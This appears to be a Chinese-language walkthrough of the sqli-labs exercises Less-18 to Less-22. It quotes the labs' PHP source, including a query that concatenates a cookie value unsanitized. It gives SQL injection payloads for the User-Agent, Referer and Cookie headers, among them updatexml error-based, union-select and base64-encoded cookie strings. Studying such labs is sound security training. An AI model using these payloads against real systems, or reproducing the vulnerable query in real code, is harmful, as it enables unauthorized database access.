less18 user-agent的注入
源碼分析:
check_input對name,password進行了過濾
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,20);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
進行查詢,並進行驗證,也就是用戶密碼正確才能進行下一步
payload:User-Agent:’ or updatexml(1,concat(’#’,(database())),0),’’)#
less19 referer的注入
同上
Referer: ’ or updatexml(1,concat(’#’,(database())),0),’’,’’)#
less-20 cookie的注入
同樣的對password和username進行了過濾,cookie中的uname未過濾
賬號,密碼同樣要求正確
通過下面的源碼可以發現,非post提交的數據可以之間取cookie進行查詢
if(!isset($_POST['submit']))
{
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo "<br><br><b>";
echo '<br><font color= "red" font size="4">';
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "</font><br>";
echo '<font color= "cyan" font size="4">';
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "</font><br>";
echo '<font color= "#FFFF00" font size = 4 >';
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo '<font color= "orange" font size = 5 >';
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
payload : Cookie:uname= ’ union select 1,2,3 – #
less-21
源碼分析:同樣對username和passwd進行了過濾
不同的是:
對username進行了編碼
sql語句
構造payload :
Cookie:uname=JykgdW5pb24gc2VsZWN0IDEsMiwzIC0tICM=
less-22
同上,閉合爲"